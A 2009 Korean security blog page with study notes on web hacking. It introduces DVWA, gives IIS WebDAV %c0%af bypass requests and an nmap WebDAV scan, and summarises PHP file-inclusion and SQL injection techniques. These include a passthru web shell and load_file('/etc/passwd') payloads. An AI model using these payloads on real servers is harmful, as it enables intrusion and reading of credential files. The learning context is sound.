2009.11.15 11:23 Web


웹 공격 테스트용으로 쓸 녀석입니다

Web goat 랑 비슷한거 같네요

그러니까 자기 컴퓨터에 특정 부분에 취약한 홈페이지를 만들어놓고 테스트 하는 셈이죠

Security level 을 조정해가면서 진행 할 수 있습니다

http://www.darknet.org.uk/2009/07/damn-vulnerable-web-app-learn-practise-web-hacking/

서버에 압축 푼걸 올리고 db 생성 하면 끗~







Posted by LinkC

2009.11.14 15:22 Web


  •  WebDAV?

    Web-based Distributed Authoring and Versioning
    Web 에서 분산 Authoring을 수행하기 위한 HTTP의 확장 프로토콜
    MKCOL, COPY, MOVE, LOCK, UNLOCK 등의 메소드 추가

    간단한 웹하드를 구현할 수 있고, FTP를 통하지 않고 HTTP 프로토콜을 통해
    웹상의 파일을 송수신 하고 수정, 삭제 할 수 있다


  • 취약점

'/' 를 %c0%af 로 우회

GET /  %c0%af/protected/protected.zip HTTP/1.1
         Translate: f
         Connection: close
         Host: servername

GET /prot%c0%afected/protected.zip HTTP/1.1
         Translate: f
         Connection: close
         Host: servername


동영상 : http://vimeo.com/4750408 


  • nmap 을 이용한 WebDAV 스캔


 

$ svn co --username guest --password "" svn://svn.insecure.org/nmap/
$ cd nmap
$ ./configure
$ make
$ make install

 해서 nmap을 깐 뒤

http://nmap.org/svn/scripts/http-iis-webdav-vuln.nse 이곳에서 script를 받습니다. 

$ cd /usr/local/share/nmap/scripts

$ wget http://nmap.org/svn/scripts/http-iis-webdav-vuln.nse

 

다음으로 스캔을 시작합니다.
예로 

$ nmap -n -PN -p80 --script=http-iis-webdav-vuln 122.122.122.122

 에러가 날수도 있는데요.
data폴더에 folders.lst 파일이 없는 경우 입니다. 

아까 받은 namp 폴더에서 /nselib/data 안의 파일을 /usr/local/share/nmap/nselib/data로 복사하여 실행합니다



출처:http://boanin.tistory.com/127


 

Posted by LinkC

2009.10.28 23:23 Web

Wowhacker 의 b0BaNa 님의 번역본 요약
기본적으로 PHP 취약점 이용
ex)require($file);

2.2 - 원격으로 명령어 실행

<? passthru($_GET[cmd]) ?>

2.2.1-아파치 로그로 PHP 코드 삽입

error.log를 이용 [ 경로 필요 ]

2.2.2-프로세스 테이블에 PHP 코드 삽입

/proc/self  마지막으로 사용된 PID 링크

2.2.3-그림으로 PHP 코드 삽입

코드는 그대로 하고 확장자만 바꿔 우회

2.2.4-세션 파일을 이용한 PHP 코드 삽입

<?php
$user=$_GET['user'];
session_register("user");
session_start();
?>

2.2.5-다른 파일들에 PHP 코드 삽입

ex) FTP 로그, webalizer ,PUT Method

2.3 쉘 획득

ex) wget , 리버스 텔넷

2.4 원격으로 파일 첨가하기

allow_url_include 허용되었다면, 직접 쉘 삽입 가능

3. 블라인드 sql injection



3.2 로컬 파일 읽어오기

union select load_file('/etc/passwd');

3.3 brute force 없이 데이터 획득

outfile "/tmp/sql.txt"
union select 1,2,3,load_file('/tmp/sql.txt');


3.4 원격으로 명령어 실행







Posted by LinkC
이전버튼 1 2 이전버튼

블로그 이미지
LinkC

태그목록

Tistory Cumulus Flash tag cloud by BLUEnLIVE requires Flash Player 9 or better.

공지사항

Yesterday31
Today2
Total331,153

달력

 « |  » 2019.8
        1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31

최근에 받은 트랙백

글 보관함


. .